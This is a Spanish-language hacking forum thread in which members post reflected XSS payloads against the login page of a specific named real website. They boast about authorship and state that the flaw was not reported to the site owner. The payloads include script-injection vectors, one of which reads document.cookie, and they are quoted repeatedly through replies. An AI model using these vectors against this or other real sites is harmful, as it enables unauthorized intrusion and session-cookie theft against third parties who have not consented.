(http://i50.tinypic.com/352g877.png)
(http://i48.tinypic.com/25smr5y.png)
Xss Reflected:
Web: http://www.cotec.com.ar/login2.asp
Vector: <script>alert("HD_Breaker")</script>
Reportado: No
PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS
Buena, he encontrado varias así mismo.
Yo siempre eh tratado pero no eh encontrado web con esa vulnerabilidad en el login..
Muy bueno, gracias por compartir!
Saludos,, Cronos.-
Xss Reflected
Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax
IFXss
Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax
Salu2
OverHoax
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Xss Reflected
Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax
IFXss
Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax
Salu2
OverHoax
??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Xss Reflected
Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax
IFXss
Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax
Salu2
OverHoax
??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?
Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Xss Reflected
Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax
IFXss
Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax
Salu2
OverHoax
??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?
Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss
No se reportan todos los vectores, se reporta el fallo, XSS, IFxss es una variacion que depende del script inyectado pero sigue haciendo uso de un XSS
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
wow me sorprende tu conocimiento
respeto.
Jajajaajaajajajajaa que Kapo.